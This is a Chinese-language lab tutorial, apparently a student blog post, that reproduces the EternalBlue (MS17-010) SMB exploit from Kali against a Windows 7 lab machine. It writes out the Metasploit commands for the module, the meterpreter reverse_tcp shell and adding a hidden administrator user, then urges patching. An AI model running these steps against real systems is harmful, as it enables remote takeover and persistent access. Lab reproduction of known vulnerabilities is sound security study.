永恒之蓝漏洞复现

永恒之蓝介绍

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限，随后wannacry勒索病毒席卷全球，永恒之蓝也在安全界“臭名远扬”。

攻击方式

我们都知道永恒之蓝利用445端口进行攻击，445是用来实现文件共享的端口（SMB协议），假如445端口开放，用户只要开机上网，“永恒之蓝”就能在电脑里执行任意代码，植入勒索病毒等恶意程序。

漏洞复现

实验环境

渗透机 Kali ：192.168.9.130
靶 机 Win7 ：192.168.9.129

1.kali使用nmap进行端口扫描，发现win7开放445端口

2.开启数据库服务

3.启动msf，查看漏洞模块

启动命令：msfconsole msf
查看命令： > search ms17-010

4.进入ms17_010模块的路径，并查看配置选项参数

5.设置攻击目标 rhosts（Win7靶机），并查看靶机系统

6.设置攻击参数并开始攻击

使用攻击模块 > use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标 > set rhosts IP
设置监听目标 > set lhosts IP (如果出现不能run，则改成lhost）
设置反弹shell类型 > set payloads windows/x64/meterpreter/reverse_tcp
开始攻击 > run

7.进入Meterpreter（攻击载荷使用通道），进行操作

查看靶机信息 > sysinfo
截图 > screenshot

8.获取控制台shell

命令：meterpreter > shell

此时我们成功连接后门，进入了Win7的cmd命令行

我们可以查看用户

添加用户，并将其加入管理员组，赋予其管理员权限

此时Win7上便有了新增的用户，且该用户拥有管理员权限，我们便可以利用远程去直接操控对端PC。（其实在获得cmd权限的时候，已经“无敌”了）

总结

我们可以发现在整个过程中，全在kali上操作，只因为开启445端口，靶机直接无辜“躺枪”，且kali可以获取cmd权限。所以同学们平时记得及时更新系统并打补丁~~

好困zzzzz